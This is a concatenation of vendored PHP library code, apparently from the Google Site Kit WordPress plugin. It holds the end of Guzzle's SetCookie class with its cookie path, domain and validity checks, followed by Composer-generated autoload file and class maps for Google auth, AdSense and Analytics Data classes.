trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an int, string or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Expires'] = null === $timestamp ? null : (\is_numeric($timestamp) ? (int) $timestamp : \strtotime((string) $timestamp)); } /** * Get whether or not this is a secure cookie. * * @return bool */ public function getSecure() { return $this->data['Secure']; } /** * Set whether or not the cookie is secure. * * @param bool $secure Set to true or false if secure */ public function setSecure($secure) : void { if (!\is_bool($secure)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Secure'] = (bool) $secure; } /** * Get whether or not this is a session cookie. * * @return bool|null */ public function getDiscard() { return $this->data['Discard']; } /** * Set whether or not this is a session cookie. * * @param bool $discard Set to true or false if this is a session cookie */ public function setDiscard($discard) : void { if (!\is_bool($discard)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Discard'] = (bool) $discard; } /** * Get whether or not this is an HTTP only cookie. * * @return bool */ public function getHttpOnly() { return $this->data['HttpOnly']; } /** * Set whether or not this is an HTTP only cookie. * * @param bool $httpOnly Set to true or false if this is HTTP only */ public function setHttpOnly($httpOnly) : void { if (!\is_bool($httpOnly)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['HttpOnly'] = (bool) $httpOnly; } /** * Check if the cookie matches a path value. * * A request-path path-matches a given cookie-path if at least one of * the following conditions holds: * * - The cookie-path and the request-path are identical. * - The cookie-path is a prefix of the request-path, and the last * character of the cookie-path is %x2F ("/"). * - The cookie-path is a prefix of the request-path, and the first * character of the request-path that is not included in the cookie- * path is a %x2F ("/") character. * * @param string $requestPath Path to check against */ public function matchesPath(string $requestPath) : bool { $cookiePath = $this->getPath(); // Match on exact matches or when path is the default empty "/" if ($cookiePath === '/' || $cookiePath == $requestPath) { return \true; } // Ensure that the cookie-path is a prefix of the request path. if (0 !== \strpos($requestPath, $cookiePath)) { return \false; } // Match if the last character of the cookie-path is "/" if (\substr($cookiePath, -1, 1) === '/') { return \true; } // Match if the first character not included in cookie path is "/" return \substr($requestPath, \strlen($cookiePath), 1) === '/'; } /** * Check if the cookie matches a domain value. * * @param string $domain Domain to check against */ public function matchesDomain(string $domain) : bool { $cookieDomain = $this->getDomain(); if (null === $cookieDomain) { return \true; } // Remove the leading '.' as per spec in RFC 6265. // https://datatracker.ietf.org/doc/html/rfc6265#section-5.2.3 $cookieDomain = \ltrim(\strtolower($cookieDomain), '.'); $domain = \strtolower($domain); // Domain not set or exact match. if ('' === $cookieDomain || $domain === $cookieDomain) { return \true; } // Matching the subdomain according to RFC 6265. // https://datatracker.ietf.org/doc/html/rfc6265#section-5.1.3 if (\filter_var($domain, \FILTER_VALIDATE_IP)) { return \false; } return (bool) \preg_match('/\\.' . \preg_quote($cookieDomain, '/') . '$/', $domain); } /** * Check if the cookie is expired. */ public function isExpired() : bool { return $this->getExpires() !== null && \time() > $this->getExpires(); } /** * Check if the cookie is valid according to RFC 6265. * * @return bool|string Returns true if valid or an error message if invalid */ public function validate() { $name = $this->getName(); if ($name === '') { return 'The cookie name must not be empty'; } // Check if any of the invalid characters are present in the cookie name if (\preg_match('/[\\x00-\\x20\\x22\\x28-\\x29\\x2c\\x2f\\x3a-\\x40\\x5c\\x7b\\x7d\\x7f]/', $name)) { return 'Cookie name must not contain invalid characters: ASCII ' . 'Control characters (0-31;127), space, tab and the ' . 'following characters: ()<>@,;:\\"/?={}'; } // Value must not be null. 0 and empty string are valid. Empty strings // are technically against RFC 6265, but known to happen in the wild. $value = $this->getValue(); if ($value === null) { return 'The cookie value must not be empty'; } // Domains must not be empty, but can be 0. "0" is not a valid internet // domain, but may be used as server name in a private network. $domain = $this->getDomain(); if ($domain === null || $domain === '') { return 'The cookie domain must not be empty'; } return \true; } } <?php // autoload_files.php @generated by Composer $vendorDir = dirname(dirname(__FILE__)); $baseDir = dirname($vendorDir); return array( '7b11c4dc42b3b3023073cb14e519683c' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php', '6e3fae29631ef280660b3cdad06f25a8' => $vendorDir . '/symfony/deprecation-contracts/function.php', '37a3dc5111fe8f707ab4c132ef1dbc62' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php', 'decc78cc4436b1292c6c0d151b19445c' => $vendorDir . '/phpseclib/phpseclib/phpseclib/bootstrap.php', '1f87db08236948d07391152dccb70f04' => $vendorDir . '/google/apiclient-services/autoload.php', 'e69f7f6ee287b969198c3c9d6777bd38' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php', '25072dd6e2470089de65ae7bf11d3109' => $vendorDir . '/symfony/polyfill-php72/bootstrap.php', 'a8d3953fd9959404dd22d3dfcd0a79f0' => $vendorDir . '/google/apiclient/src/aliases.php', 'f598d06aa772fa33d905e87be6398fb1' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php', ); <?php // autoload_classmap.php @generated by Composer $vendorDir = dirname(dirname(__FILE__)); $baseDir = dirname($vendorDir); return array( 'Composer\\InstalledVersions' => $vendorDir . '/composer/InstalledVersions.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\BeforeValidException' => $baseDir . '/firebase/php-jwt/src/BeforeValidException.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\CachedKeySet' => $baseDir . '/firebase/php-jwt/src/CachedKeySet.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\ExpiredException' => $baseDir . '/firebase/php-jwt/src/ExpiredException.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\JWK' => $baseDir . '/firebase/php-jwt/src/JWK.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\JWT' => $baseDir . '/firebase/php-jwt/src/JWT.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\JWTExceptionWithPayloadInterface' => $baseDir . '/firebase/php-jwt/src/JWTExceptionWithPayloadInterface.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\Key' => $baseDir . '/firebase/php-jwt/src/Key.php', 'Google\\Site_Kit_Dependencies\\Firebase\\JWT\\SignatureInvalidException' => $baseDir . '/firebase/php-jwt/src/SignatureInvalidException.php', 'Google\\Site_Kit_Dependencies\\Google\\AccessToken\\Revoke' => $baseDir . '/google/apiclient/src/AccessToken/Revoke.php', 'Google\\Site_Kit_Dependencies\\Google\\AccessToken\\Verify' => $baseDir . '/google/apiclient/src/AccessToken/Verify.php', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\AuthHandlerFactory' => $baseDir . '/google/apiclient/src/AuthHandler/AuthHandlerFactory.php', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\Guzzle6AuthHandler' => $baseDir . '/google/apiclient/src/AuthHandler/Guzzle6AuthHandler.php', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\Guzzle7AuthHandler' => $baseDir . '/google/apiclient/src/AuthHandler/Guzzle7AuthHandler.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\AccessToken' => $baseDir . '/google/auth/src/AccessToken.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\ApplicationDefaultCredentials' => $baseDir . '/google/auth/src/ApplicationDefaultCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\CacheTrait' => $baseDir . '/google/auth/src/CacheTrait.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Cache\\InvalidArgumentException' => $baseDir . '/google/auth/src/Cache/InvalidArgumentException.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Cache\\Item' => $baseDir . '/google/auth/src/Cache/Item.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Cache\\MemoryCacheItemPool' => $baseDir . '/google/auth/src/Cache/MemoryCacheItemPool.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Cache\\SysVCacheItemPool' => $baseDir . '/google/auth/src/Cache/SysVCacheItemPool.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Cache\\TypedItem' => $baseDir . '/google/auth/src/Cache/TypedItem.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\CredentialSource\\AwsNativeSource' => $baseDir . '/google/auth/src/CredentialSource/AwsNativeSource.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\CredentialSource\\FileSource' => $baseDir . '/google/auth/src/CredentialSource/FileSource.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\CredentialSource\\UrlSource' => $baseDir . '/google/auth/src/CredentialSource/UrlSource.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\CredentialsLoader' => $baseDir . '/google/auth/src/CredentialsLoader.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\AppIdentityCredentials' => $baseDir . '/google/auth/src/Credentials/AppIdentityCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\ExternalAccountCredentials' => $baseDir . '/google/auth/src/Credentials/ExternalAccountCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\GCECredentials' => $baseDir . '/google/auth/src/Credentials/GCECredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\IAMCredentials' => $baseDir . '/google/auth/src/Credentials/IAMCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\ImpersonatedServiceAccountCredentials' => $baseDir . '/google/auth/src/Credentials/ImpersonatedServiceAccountCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\InsecureCredentials' => $baseDir . '/google/auth/src/Credentials/InsecureCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\ServiceAccountCredentials' => $baseDir . '/google/auth/src/Credentials/ServiceAccountCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\ServiceAccountJwtAccessCredentials' => $baseDir . '/google/auth/src/Credentials/ServiceAccountJwtAccessCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Credentials\\UserRefreshCredentials' => $baseDir . '/google/auth/src/Credentials/UserRefreshCredentials.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\ExternalAccountCredentialSourceInterface' => $baseDir . '/google/auth/src/ExternalAccountCredentialSourceInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\FetchAuthTokenCache' => $baseDir . '/google/auth/src/FetchAuthTokenCache.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\FetchAuthTokenInterface' => $baseDir . '/google/auth/src/FetchAuthTokenInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\GCECache' => $baseDir . '/google/auth/src/GCECache.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\GetQuotaProjectInterface' => $baseDir . '/google/auth/src/GetQuotaProjectInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\GetUniverseDomainInterface' => $baseDir . '/google/auth/src/GetUniverseDomainInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\HttpHandler\\Guzzle6HttpHandler' => $baseDir . '/google/auth/src/HttpHandler/Guzzle6HttpHandler.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\HttpHandler\\Guzzle7HttpHandler' => $baseDir . '/google/auth/src/HttpHandler/Guzzle7HttpHandler.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\HttpHandler\\HttpClientCache' => $baseDir . '/google/auth/src/HttpHandler/HttpClientCache.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\HttpHandler\\HttpHandlerFactory' => $baseDir . '/google/auth/src/HttpHandler/HttpHandlerFactory.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Iam' => $baseDir . '/google/auth/src/Iam.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\IamSignerTrait' => $baseDir . '/google/auth/src/IamSignerTrait.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Middleware\\AuthTokenMiddleware' => $baseDir . '/google/auth/src/Middleware/AuthTokenMiddleware.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Middleware\\ProxyAuthTokenMiddleware' => $baseDir . '/google/auth/src/Middleware/ProxyAuthTokenMiddleware.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Middleware\\ScopedAccessTokenMiddleware' => $baseDir . '/google/auth/src/Middleware/ScopedAccessTokenMiddleware.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\Middleware\\SimpleMiddleware' => $baseDir . '/google/auth/src/Middleware/SimpleMiddleware.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\OAuth2' => $baseDir . '/google/auth/src/OAuth2.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\ProjectIdProviderInterface' => $baseDir . '/google/auth/src/ProjectIdProviderInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\ServiceAccountSignerTrait' => $baseDir . '/google/auth/src/ServiceAccountSignerTrait.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\SignBlobInterface' => $baseDir . '/google/auth/src/SignBlobInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\UpdateMetadataInterface' => $baseDir . '/google/auth/src/UpdateMetadataInterface.php', 'Google\\Site_Kit_Dependencies\\Google\\Auth\\UpdateMetadataTrait' => $baseDir . '/google/auth/src/UpdateMetadataTrait.php', 'Google\\Site_Kit_Dependencies\\Google\\Client' => $baseDir . '/google/apiclient/src/Client.php', 'Google\\Site_Kit_Dependencies\\Google\\Collection' => $baseDir . '/google/apiclient/src/Collection.php', 'Google\\Site_Kit_Dependencies\\Google\\Exception' => $baseDir . '/google/apiclient/src/Exception.php', 'Google\\Site_Kit_Dependencies\\Google\\Http\\Batch' => $baseDir . '/google/apiclient/src/Http/Batch.php', 'Google\\Site_Kit_Dependencies\\Google\\Http\\MediaFileUpload' => $baseDir . '/google/apiclient/src/Http/MediaFileUpload.php', 'Google\\Site_Kit_Dependencies\\Google\\Http\\REST' => $baseDir . '/google/apiclient/src/Http/REST.php', 'Google\\Site_Kit_Dependencies\\Google\\Model' => $baseDir . '/google/apiclient/src/Model.php', 'Google\\Site_Kit_Dependencies\\Google\\Service' => $baseDir . '/google/apiclient/src/Service.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense' => $baseDir . '/google/apiclient-services/src/Adsense.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Account' => $baseDir . '/google/apiclient-services/src/Adsense/Account.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdBlockingRecoveryTag' => $baseDir . '/google/apiclient-services/src/Adsense/AdBlockingRecoveryTag.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdClient' => $baseDir . '/google/apiclient-services/src/Adsense/AdClient.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdClientAdCode' => $baseDir . '/google/apiclient-services/src/Adsense/AdClientAdCode.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdUnit' => $baseDir . '/google/apiclient-services/src/Adsense/AdUnit.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdUnitAdCode' => $baseDir . '/google/apiclient-services/src/Adsense/AdUnitAdCode.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\AdsenseEmpty' => $baseDir . '/google/apiclient-services/src/Adsense/AdsenseEmpty.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Alert' => $baseDir . '/google/apiclient-services/src/Adsense/Alert.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Cell' => $baseDir . '/google/apiclient-services/src/Adsense/Cell.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ContentAdsSettings' => $baseDir . '/google/apiclient-services/src/Adsense/ContentAdsSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\CustomChannel' => $baseDir . '/google/apiclient-services/src/Adsense/CustomChannel.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Date' => $baseDir . '/google/apiclient-services/src/Adsense/Date.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Header' => $baseDir . '/google/apiclient-services/src/Adsense/Header.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\HttpBody' => $baseDir . '/google/apiclient-services/src/Adsense/HttpBody.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListAccountsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListAccountsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListAdClientsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListAdClientsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListAdUnitsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListAdUnitsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListAlertsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListAlertsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListChildAccountsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListChildAccountsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListCustomChannelsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListCustomChannelsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListLinkedAdUnitsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListLinkedAdUnitsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListLinkedCustomChannelsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListLinkedCustomChannelsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListPaymentsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListPaymentsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListPolicyIssuesResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListPolicyIssuesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListSavedReportsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListSavedReportsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListSitesResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListSitesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ListUrlChannelsResponse' => $baseDir . '/google/apiclient-services/src/Adsense/ListUrlChannelsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Payment' => $baseDir . '/google/apiclient-services/src/Adsense/Payment.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\PolicyIssue' => $baseDir . '/google/apiclient-services/src/Adsense/PolicyIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\PolicyTopic' => $baseDir . '/google/apiclient-services/src/Adsense/PolicyTopic.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\ReportResult' => $baseDir . '/google/apiclient-services/src/Adsense/ReportResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\Accounts' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/Accounts.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsAdclients' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsAdclients.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsAdclientsAdunits' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsAdclientsAdunits.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsAdclientsCustomchannels' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsAdclientsCustomchannels.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsAdclientsUrlchannels' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsAdclientsUrlchannels.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsAlerts' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsAlerts.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsPayments' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsPayments.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsPolicyIssues' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsPolicyIssues.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsReports' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsReports.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsReportsSaved' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsReportsSaved.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Resource\\AccountsSites' => $baseDir . '/google/apiclient-services/src/Adsense/Resource/AccountsSites.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Row' => $baseDir . '/google/apiclient-services/src/Adsense/Row.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\SavedReport' => $baseDir . '/google/apiclient-services/src/Adsense/SavedReport.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\Site' => $baseDir . '/google/apiclient-services/src/Adsense/Site.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\TimeZone' => $baseDir . '/google/apiclient-services/src/Adsense/TimeZone.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Adsense\\UrlChannel' => $baseDir . '/google/apiclient-services/src/Adsense/UrlChannel.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData' => $baseDir . '/google/apiclient-services/src/AnalyticsData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\ActiveMetricRestriction' => $baseDir . '/google/apiclient-services/src/AnalyticsData/ActiveMetricRestriction.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\AudienceExport' => $baseDir . '/google/apiclient-services/src/AnalyticsData/AudienceExport.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\AudienceListMetadata' => $baseDir . '/google/apiclient-services/src/AnalyticsData/AudienceListMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\BatchRunPivotReportsRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/BatchRunPivotReportsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\BatchRunPivotReportsResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/BatchRunPivotReportsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\BatchRunReportsRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/BatchRunReportsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\BatchRunReportsResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/BatchRunReportsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\BetweenFilter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/BetweenFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CaseExpression' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CaseExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CheckCompatibilityRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CheckCompatibilityRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CheckCompatibilityResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CheckCompatibilityResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Cohort' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Cohort.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CohortReportSettings' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CohortReportSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CohortSpec' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CohortSpec.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\CohortsRange' => $baseDir . '/google/apiclient-services/src/AnalyticsData/CohortsRange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\ConcatenateExpression' => $baseDir . '/google/apiclient-services/src/AnalyticsData/ConcatenateExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DateRange' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DateRange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Dimension' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Dimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionCompatibility' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionCompatibility.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionExpression' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionHeader' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionMetadata' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionOrderBy' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\DimensionValue' => $baseDir . '/google/apiclient-services/src/AnalyticsData/DimensionValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\EmptyFilter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/EmptyFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Filter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Filter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\FilterExpression' => $baseDir . '/google/apiclient-services/src/AnalyticsData/FilterExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\FilterExpressionList' => $baseDir . '/google/apiclient-services/src/AnalyticsData/FilterExpressionList.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\InListFilter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/InListFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\ListAudienceExportsResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/ListAudienceExportsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Metadata' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Metadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Metric' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Metric.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MetricCompatibility' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MetricCompatibility.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MetricHeader' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MetricHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MetricMetadata' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MetricMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MetricOrderBy' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MetricOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MetricValue' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MetricValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\MinuteRange' => $baseDir . '/google/apiclient-services/src/AnalyticsData/MinuteRange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\NumericFilter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/NumericFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\NumericValue' => $baseDir . '/google/apiclient-services/src/AnalyticsData/NumericValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Operation' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Operation.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\OrderBy' => $baseDir . '/google/apiclient-services/src/AnalyticsData/OrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Pivot' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Pivot.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\PivotDimensionHeader' => $baseDir . '/google/apiclient-services/src/AnalyticsData/PivotDimensionHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\PivotHeader' => $baseDir . '/google/apiclient-services/src/AnalyticsData/PivotHeader.php', 